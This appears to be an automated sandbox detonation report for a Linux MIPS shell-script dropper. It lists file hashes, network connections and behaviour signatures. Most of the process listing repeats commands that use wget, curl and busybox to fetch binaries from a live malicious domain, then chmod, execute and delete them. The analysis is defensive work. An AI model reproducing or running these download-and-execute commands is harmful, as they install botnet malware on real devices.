/tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz

[./BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/bin/rm

[rm BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/bin/chmod

[chmod 777 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp

[./ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/bin/rm

[rm ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/bin/chmod

[chmod 777 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n

[./IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/bin/rm

[rm IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/bin/chmod

[chmod 777 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL

[./YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/bin/rm

[rm YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/bin/chmod

[chmod 777 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz

[./BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/bin/rm

[rm BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/bin/chmod

[chmod 777 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o

[./jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/bin/rm

[rm jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/bin/chmod

[chmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw

[./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/bin/rm

[rm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/bin/chmod

[chmod 777 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF

[./fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/bin/rm

[rm fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/bin/chmod

[chmod 777 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB

[./9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/bin/rm

[rm 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/bin/chmod

[chmod 777 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca

[./SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/bin/rm

[rm SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/bin/chmod

[chmod 777 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey

[./L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/bin/rm

[rm L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/bin/chmod

[chmod 777 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod

[./vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/bin/rm

[rm vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/bin/chmod

[chmod 777 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG

[./5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/bin/rm

[rm 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/bin/chmod

[chmod 777 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4

[./2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/bin/rm

[rm 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/bin/chmod

[chmod 777 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq

[./qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/bin/rm

[rm qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-28 01:45

Reported

2024-10-28 01:47

Platform

debian9-mipsel-20240611-en

Max time kernel

80s

Max time network

79s

Command Line

[/tmp/68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw N/A
N/A /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF N/A
N/A /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB N/A
N/A /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o N/A
N/A /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey N/A
N/A /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod N/A
N/A /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG N/A
N/A /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 N/A
N/A /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq N/A
N/A /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca N/A
N/A /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp N/A
N/A /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n N/A
N/A /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL N/A
N/A /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz N/A
N/A /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp N/A
N/A /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n N/A
N/A /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL N/A
N/A /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz N/A
N/A /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o N/A
N/A /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw N/A
N/A /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF N/A
N/A /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB N/A
N/A /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca N/A
N/A /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey N/A
N/A /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod N/A
N/A /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG N/A
N/A /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 N/A
N/A /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
